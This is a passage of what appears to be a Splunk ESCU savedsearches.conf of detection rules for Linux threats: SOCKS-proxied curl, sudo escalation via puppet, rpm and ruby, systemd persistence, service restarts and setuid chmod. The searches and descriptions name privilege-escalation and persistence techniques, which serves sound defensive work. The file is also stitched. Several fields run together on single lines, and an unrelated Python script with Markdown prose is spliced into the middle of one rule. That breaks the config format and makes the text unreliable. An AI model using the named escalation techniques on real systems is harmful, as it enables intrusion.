action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Proxy Socks Curl - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1090", "T1095"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies curl being utilized with a proxy based on command-line arguments: -x, socks, --preproxy and --proxy. This behavior is built into the Metasploit Framework as an auxiliary module. What does SOCKS buy an adversary? SOCKS4a extends the SOCKS4 protocol to allow a client to specify a destination domain name rather than an IP address. The SOCKS5 protocol is defined in RFC 1928. It is an incompatible extension of the SOCKS4 protocol; it offers more choices for authentication and adds support for IPv6 and UDP, the latter of which can be used for DNS lookups. The protocols, and a proxy itself, allow an adversary to evade controls in place to monitor traffic, making it harder for the defender to identify and track activity.
action.notable.param.rule_title = Linux Proxy Socks Curl
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process IN ("*-x *", "*socks4a://*", "*socks5h://*", "*socks4://*", "*socks5://*", "*--preproxy *", "*--proxy*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_proxy_socks_curl_filter`

[ESCU - Linux Puppet Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = In computing, Puppet is a software configuration management tool which includes its own declarative language to describe system configuration. It is a model-driven solution that requires limited programming knowledge to use. If sudo rights are granted to the tool for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = In computing, Puppet is a software configuration management tool which includes its own declarative language to describe system configuration. It is a model-driven solution that requires limited programming knowledge to use. If sudo rights are granted to the tool for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present, filter as needed.
action.escu.creation_date = 2022-08-11
action.escu.modification_date = 2022-08-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Puppet Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Puppet Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*puppet*" AND Processes.process="*apply*" AND Processes.process="*-e*" AND Processes.process="*exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_puppet_privilege_escalation_filter`

[ESCU - Linux RPM Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = RPM Package Manager is a free and open-source package management system. The name RPM refers to the .rpm file format and the package manager program itself. RPM was intended primarily for Linux distributions; the file format is the baseline package format of the Linux Standard Base. If sudo rights are granted to the rpm utility for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = RPM Package Manager is a free and open-source package management system. The name RPM refers to the .rpm file format and the package manager program itself. RPM was intended primarily for Linux distributions; the file format is the baseline package format of the Linux Standard Base. If sudo rights are granted to the rpm utility for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed.
action.escu.creation_date = 2022-08-09
action.escu.modification_date = 2022-08-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux RPM Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux RPM Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*rpm*--eval*" AND Processes.process="*lua:os.execute*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_rpm_privilege_escalation_filter`

[ESCU - Linux Ruby Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = Ruby is one of the most widely used and easy-to-use programming languages. Ruby is an open-source, object-oriented interpreter that can be installed on a Linux system. If sudo rights are granted to the ruby application for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Ruby is one of the most widely used and easy-to-use programming languages. Ruby is an open-source, object-oriented interpreter that can be installed on a Linux system. If sudo rights are granted to the ruby application for a user, that user can run system commands as root and possibly obtain a root shell.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed.
action.escu.creation_date = 2022-08-09
action.escu.modification_date = 2022-08-09
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Ruby Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Ruby Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*ruby*-e*" AND Processes.process="*exec*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ruby_privilege_escalation_filter`

[ESCU - Linux Service File Created In Systemd Directory - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic is designed to detect suspicious file creation within the systemd service directories on Linux platforms. Systemd is a system and service manager for Linux, similar to the combination of wininit.exe and services.exe on Windows. This process initializes a Linux system and starts the services defined in unit files. Malicious actors, such as adversaries, malware, or red teamers, can exploit this feature by embedding a systemd service file for persistence on the targeted or compromised host.\
The analytic works by monitoring logs with file name, file path, and process GUID data from your endpoints. If a .service file is created in certain systemd directories, the analytic triggers an alert. This behavior is significant for a Security Operations Center (SOC) as it may indicate a persistent threat within the network, with a potential impact of system compromise or data exfiltration.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect suspicious file creation within the systemd timer directory on Linux platforms. Systemd is a system and service manager for Linux, similar to the combination of wininit.exe and services.exe on Windows. This process initializes a Linux system and starts defined services in unit files. Malicious actors, such as adversaries, malware, or red teamers, can exploit this feature by embedding a systemd service file for persistence on the targeted or compromised host.\ The analytic works by monitoring logs with file name, file path, and process GUID data from your endpoints. If a .service file is created in certain systemd directories, the analytic triggers an alert. This behavior is significant for a Security Operations Center (SOC) as it may indicate a persistent threat within the network, with a potential impact of system compromise or data exfiltration. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = False positives may arise when administrators or network operators create files in systemd directories for legitimate automation tasks. Therefore, it's important to adjust filter macros to account for valid activities. To implement this search successfully, it's crucial to ingest appropriate logs, preferably using the Linux Sysmon Add-on from Splunkbase for those using Sysmon. 
action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Service File Created In Systemd Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A service file named as $file_path$ is created in systemd folder on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Service File Created In Systemd Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name = *.service Filesystem.file_path IN ("*/etc/systemd/system*", "*/lib/systemd/system*", "*/usr/lib/systemd/system*", "*/run/systemd/system*", 
"*~/.config/systemd/*", "*~/.local/share/systemd/*","*/etc/systemd/user*", "*/lib/systemd/user*", "*/usr/lib/systemd/user*", "*/run/systemd/user*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_service_file_created_in_systemd_directory_filter` [ESCU - Linux Service Restarted - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the restarting or re-enabling of services in the Linux platform. It focuses on the use of the systemctl or service tools for executing these actions. Adversaries may leverage this technique to repeatedly execute malicious payloads as a form of persistence. Linux hosts typically start services during boot to perform background system functions. However, administrators may also create legitimate services for specific tools or applications as part of task automation. In such cases, it is recommended to verify the service path of the registered script or executable and identify the creator of the service for further validation.\ It's important to be aware that this analytic may generate false positives as administrators or network operators may use the same command-line for legitimate automation purposes. Filter macros should be updated accordingly to minimize false positives.\ Identifying restarted or re-enabled services is valuable for a SOC as it can indicate potential malicious activities attempting to maintain persistence or execute unauthorized actions on Linux systems. By detecting and investigating these events, security analysts can respond promptly to mitigate risks and prevent further compromise. The impact of a true positive can range from unauthorized access to data destruction or other damaging outcomes. 
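The three systemd analytics on this page (the unit-file search just above, and the Linux Service Restarted and Linux Service Started Or Enabled searches that follow) reduce to a handful of SPL wildcard comparisons. The Python below is an added example, not Splunk Threat Research Team code, that replays those comparisons over constructed endpoint events so the edge cases become visible: a .timer file is not a .service file, the two literal `~` patterns never match a path the sensor has already expanded to /home/<user>/..., `*reload*` also catches `systemctl daemon-reload`, and the Microsoft Windows exclusion is what keeps a WSL-launched systemctl out of the started-or-enabled rule. The wildcard lists are copied from the searches; the event dicts and the EXPANDED_HOME_PATTERNS list are assumptions made for the example.

```python
"""Added example (not Splunk Threat Research Team code): the systemd checks from
the ESCU searches on this page, replayed over constructed endpoint events.

Wildcard lists are copied from the SPL of the Linux Service File Created In
Systemd Directory, Linux Service Restarted and Linux Service Started Or Enabled
rules. Event dicts and EXPANDED_HOME_PATTERNS are assumptions made for the example.
"""
from fnmatch import fnmatchcase

# Filesystem.file_path wildcards from the "Service File Created In Systemd Directory" search.
ESCU_SYSTEMD_DIR_PATTERNS = [
    "*/etc/systemd/system*", "*/lib/systemd/system*", "*/usr/lib/systemd/system*",
    "*/run/systemd/system*", "*~/.config/systemd/*", "*~/.local/share/systemd/*",
    "*/etc/systemd/user*", "*/lib/systemd/user*", "*/usr/lib/systemd/user*",
    "*/run/systemd/user*",
]
# Assumed addition, not in the ESCU search: the two "~" patterns only match a
# literal tilde, so a path the sensor has already expanded to /home/<user>/...
# needs wildcards without it.
EXPANDED_HOME_PATTERNS = ["*/.config/systemd/*", "*/.local/share/systemd/*"]

# Processes.process wildcards from the two systemctl/service searches.
TOOL_PATTERNS = ("*systemctl *", "*service *")
RESTART_VERBS = ("*restart*", "*reload*", "*reenable*")
START_VERBS = ("* start *", "* enable *")


def spl_wildcard(value, pattern):
    """Approximates an SPL '*' wildcard comparison: '*' matches any run of characters."""
    return fnmatchcase(value, pattern)


def service_file_created(event, patterns=ESCU_SYSTEMD_DIR_PATTERNS):
    """Linux Service File Created In Systemd Directory: a .service unit lands in a watched path."""
    name, path = event.get("file_name", ""), event.get("file_path", "")
    return name.endswith(".service") and any(spl_wildcard(path, p) for p in patterns)


def _uses_service_tool(event):
    proc = event.get("process", "")
    return event.get("process_name") in ("systemctl", "service") or any(
        spl_wildcard(proc, p) for p in TOOL_PATTERNS)


def service_restarted(event):
    """Linux Service Restarted: systemctl/service with a restart, reload or reenable verb."""
    proc = event.get("process", "")
    return _uses_service_tool(event) and any(spl_wildcard(proc, v) for v in RESTART_VERBS)


def service_started_or_enabled(event):
    """Linux Service Started Or Enabled, including the rule's Microsoft Windows exclusion."""
    if "Microsoft Windows" in (event.get("os"), event.get("vendor_product")):
        return False
    proc = event.get("process", "")
    return _uses_service_tool(event) and any(spl_wildcard(proc, v) for v in START_VERBS)


# Constructed telemetry for the example; field names follow the Endpoint data model.
SAMPLE_EVENTS = [
    {"dest": "web01", "file_name": "update.service", "file_path": "/etc/systemd/system/update.service"},
    {"dest": "web01", "file_name": "update.timer", "file_path": "/etc/systemd/system/update.timer"},
    {"dest": "dev02", "file_name": "sync.service", "file_path": "/home/dev/.config/systemd/user/sync.service"},
    {"dest": "web01", "process_name": "systemctl", "process": "systemctl enable --now update.service"},
    {"dest": "web01", "process_name": "systemctl", "process": "systemctl daemon-reload"},
    {"dest": "db01", "process_name": "service", "process": "/usr/sbin/service ssh restart"},
    {"dest": "win01", "process_name": "wsl.exe", "os": "Microsoft Windows",
     "process": "wsl.exe -d Ubuntu -- systemctl start nginx"},
]

RULES = (
    ("Linux Service File Created In Systemd Directory", service_file_created),
    ("Linux Service Restarted", service_restarted),
    ("Linux Service Started Or Enabled", service_started_or_enabled),
)


def run_rules(events):
    """Return (rule, dest, evidence) for every event a rule would have alerted on."""
    hits = []
    for ev in events:
        for rule, check in RULES:
            if check(ev):
                hits.append((rule, ev["dest"], ev.get("file_path") or ev.get("process")))
    return hits


if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(hit)
```

Running it yields four hits: the unit file on web01, the `enable --now` on web01, and two Linux Service Restarted hits, one of which is `systemctl daemon-reload`. The per-user unit under /home/dev only registers once EXPANDED_HOME_PATTERNS is passed in, which is the kind of check to run against your own file_path telemetry before relying on the `~` patterns.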
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the restarting or re-enabling of services on the Linux platform. It focuses on the use of the systemctl or service tools for executing these actions. Adversaries may leverage this technique to repeatedly execute malicious payloads as a form of persistence. Linux hosts typically start services during boot to perform background system functions. However, administrators may also create legitimate services for specific tools or applications as part of task automation. In such cases, it is recommended to verify the service path of the registered script or executable and identify the creator of the service for further validation.\
This analytic may generate false positives, as administrators or network operators may use the same command line for legitimate automation purposes. Filter macros should be updated accordingly to minimize false positives.\
Identifying restarted or re-enabled services is valuable for a SOC as it can indicate potential malicious activity attempting to maintain persistence or execute unauthorized actions on Linux systems. By detecting and investigating these events, security analysts can respond promptly to mitigate risks and prevent further compromise. The impact of a true positive can range from unauthorized access to data destruction or other damaging outcomes.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can use this command line for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Service Restarted - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["AwfulShred", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"]
action.risk = 1
action.risk.param._risk_message = A commandline $process$ that may restart or re-enable a service on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Service Restarted - Rule
action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("systemctl", "service") OR Processes.process IN ("*systemctl *", "*service *")) Processes.process IN ("*restart*", "*reload*", "*reenable*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_service_restarted_filter`

[ESCU - Linux Service Started Or Enabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the creation or enabling of services on Linux platforms, specifically through the systemctl or service utilities. This behavior is worth identifying as adversaries may create or modify services to execute malicious payloads as part of persistence. Legitimate services created by administrators for automation purposes may also trigger this analytic, so it is important to update the filter macros to remove false positives. If a true positive is found, it suggests a possible attacker is attempting to persist within the environment or deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the process name, parent process, and command-line executions from your endpoints.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects the creation or enabling of services on Linux platforms, specifically through the systemctl or service utilities. This behavior is worth identifying as adversaries may create or modify services to execute malicious payloads as part of persistence. Legitimate services created by administrators for automation purposes may also trigger this analytic, so it is important to update the filter macros to remove false positives. If a true positive is found, it suggests a possible attacker is attempting to persist within the environment or deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the process name, parent process, and command-line executions from your endpoints.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators or network operators can use this command line for automation purposes. Please update the filter macros to remove false positives.
action.escu.creation_date = 2024-01-24
action.escu.modification_date = 2024-01-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Linux Service Started Or Enabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"]
action.risk = 1
action.risk.param._risk_message = A commandline $process$ that may create or start a service on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Linux Service Started Or Enabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("systemctl", "service") OR Processes.process IN ("*systemctl *", "*service *")) Processes.process IN ("* start *", "* enable *") AND NOT (Processes.os="Microsoft Windows" OR Processes.vendor_product="Microsoft Windows") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_service_started_or_enabled_filter`

[ESCU - Linux Setuid Using Chmod Utility - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for suspicious chmod utility execution that sets the SUID or SGID bit on a file. A SUID (set user id) binary runs with the privileges of its owner rather than those of the user who invokes it; when the owner is root, this lets an unprivileged user temporarily gain root privileges, usually in order to run one specific program. For example, only the root account is allowed to change the password information contained in the password database, so the passwd utility is installed SUID root. In a long listing, an s in the owner's execute position means the SUID bit is set and the owner also has execute permission; a capital S means the SUID bit is set but the owner does not have execute permission. The second special permission is the SGID, or set group id, bit. It is similar to the SUID bit, except that it temporarily changes the effective group of the running program, usually to execute a program with that group's privileges. The SGID bit is set if an s or an S appears in the group section of the permissions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for suspicious chmod utility execution that sets the SUID or SGID bit on a file. A SUID (set user id) binary runs with the privileges of its owner rather than those of the user who invokes it; when the owner is root, this lets an unprivileged user temporarily gain root privileges, usually in order to run one specific program. For example, only the root account is allowed to change the password information contained in the password database, so the passwd utility is installed SUID root. In a long listing, an s in the owner's execute position means the SUID bit is set and the owner also has execute permission; a capital S means the SUID bit is set but the owner does not have execute permission. The second special permission is the SGID, or set group id, bit. It is similar to the SUID bit, except that it temporarily changes the effective group of the running program, usually to execute a program with that group's privileges. The SGID bit is set if an s or an S appears in the group section of the permissions.
